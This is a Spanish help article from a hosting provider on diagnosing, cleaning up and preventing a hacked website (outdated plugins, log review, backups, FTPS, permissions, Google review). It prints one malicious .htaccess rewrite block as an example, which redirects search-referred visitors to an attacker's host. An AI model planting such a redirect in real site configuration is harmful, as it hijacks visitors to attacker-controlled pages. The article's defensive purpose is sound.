¡Ayuda! Mi web ha sido hackeada. ¿Cómo puedo solucionarlo o evitarlo?
Es muy desagradable que hackeen su cuenta. Hacemos todo lo posible para ponérselo difícil a los hackers, pero por desgracia puede ocurrir que un hacker consiga acceder a su web. En ese caso es importante intentar averiguar cómo ha conseguido el hacker acceder a su sistema.
Puede ser una tarea difícil y laboriosa, pero conocer la causa o el origen es importante para poder evitarlo en el futuro. Eliminarlo todo y restaurar una copia de seguridad no es la solución.
No vuelva a poner en línea la web infectada a menos que esté 100% seguro de que el problema está resuelto y de que es segura.
Usted mismo puede desactivar temporalmente su dominio desde el panel de control, en la configuración del dominio (o mediante la opción de sitios web en el hosting Windows), para que la web hackeada no pueda causar más daños a terceros. Si lo desea, puede restaurar una copia de seguridad antigua mediante Installatron (hosting Linux) o utilizar nuestro módulo de copias de seguridad. Elimine primero todas las carpetas y archivos y restaure la copia de seguridad solo después; de lo contrario, los archivos nuevos y hackeados seguirían en su sitio.
También puede optar por que nuestros expertos resuelvan el hackeo. Como es un trabajo laborioso, por desgracia este servicio no es gratuito.
Haga clic aquí para obtener más información.
Investigar las posibles causas:
- La causa más frecuente: utiliza un script o un plugin que no está actualizado a la última versión, no es seguro o contiene errores. También puede ser un módulo de, por ejemplo, WordPress o Joomla.
- Ofrece a sus visitantes la posibilidad de subir archivos y uno de ellos ha subido un programa PHP y lo ha ejecutado.
- Utiliza contraseñas predecibles, demasiado sencillas o contraseñas que se pueden averiguar, por ejemplo, a través de haveibeenpwned.com.
- Su equipo está infectado con un virus, gusano o keylogger que obtiene así contraseñas y nombres de usuario, por ejemplo de su cuenta FTP.
- Ha creado un formulario en el que se puede introducir, por ejemplo, código SQL o PHP, o un formulario sin Captcha con el que se puede enviar spam.
- Busque en los archivos de registro del navegador (en DirectAdmin, en el menú de estadísticas / registros) si aparecen cosas sospechosas. Busque también en Litespeed/Apache Usage Log y Backed up Apache logs. Busque direcciones IP de países extraños y, sobre todo, órdenes POST combinadas con una dirección IP de un país extraño. A menudo ahí se encuentra algo. Con una web como www.whatsmyip.org puede averiguar de qué país procede una dirección IP.
Cómo evitar un hackeo:
- Lo más importante: asegúrese de que todos sus scripts, como WordPress/Joomla, estén siempre al día con las actualizaciones más recientes. Esto vale también para los plugins y las plantillas. Normalmente las actualizaciones se pueden instalar fácilmente mediante Installatron o desde el propio script.
- Utilice FTPS en lugar de FTP normal.
- No utilice NUNCA SU nombre de usuario y contraseña en scripts. Si es imprescindible, cree un usuario aparte para ello en el panel de control.
- Utilice solo scripts conocidos y de buena reputación y manténgalos actualizados.
- No ofrezca NUNCA la posibilidad de subir archivos. Es muy peligroso.
WordPress, Joomla y otros scripts: ¡asegúrese de tener instalada la versión más reciente!
Es importante mantener WordPress, Joomla y otros scripts actualizados. Así se pueden evitar la mayoría de los hackeos. Con Installatron (hosting Linux) es muy fácil instalar actualizaciones. Si no instaló WordPress, Joomla u otro script mediante Installatron, puede importarlo fácilmente en Installatron y después actualizar su script.
Proteger carpetas como administrator en Joomla
Es importante proteger especialmente carpetas como /administrator. Este artículo explica cómo hacerlo.
Hackeo por iframe:
Si es víctima del hackeo por iframe, la causa suele ser un troyano instalado en su PC que obtiene acceso a sus cuentas FTP.
- Compruebe si su web está realmente hackeada. Puede hacerlo, por ejemplo, con la web UnmaskParasites.
- Utilice FTPS en lugar de FTP para conectarse. FTP envía todos los datos en texto legible; FTPS cifra los datos enviados, por lo que a los hackers les resulta más difícil obtener esos datos sensibles.
- Cambie ahora todas sus contraseñas FTP.
- Cambie todas las carpetas (Linux) a chmod 755 y todos los archivos a chmod 644, desde el panel de control/administrador de archivos o por FTP.
Hackeo de HTACCESS / el archivo .htaccess ha sido modificado:
En el ejemplo siguiente, un hacker ha modificado su .htaccess. Así, Google y Yahoo siguen indexando su web con normalidad, pero todos los demás visitantes son redirigidos a la web del hacker.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteRule .* http://hacker.xx/in.html?= [R,L]
Google considera su web un sitio atacante (¡Sitio atacante denunciado!):
En los enlaces siguientes puede solicitar información (introduzca su propio nombre de dominio):
En este enlace puede obtener información, entre otras cosas, y también solicitar que su dominio o web deje de considerarse un sitio atacante. ¡Asegúrese de que esté realmente limpio del todo!
http://www.google.com/support/webmasters/bin/answer.py?hl=nl&answer=45432
- Seleccione la web deseada en el panel de las Herramientas para webmasters.
- En el mensaje 'Algunas partes de este sitio pueden distribuir software malicioso', haga clic en 'Más información'.
- Haga clic en 'Solicitar una revisión'.
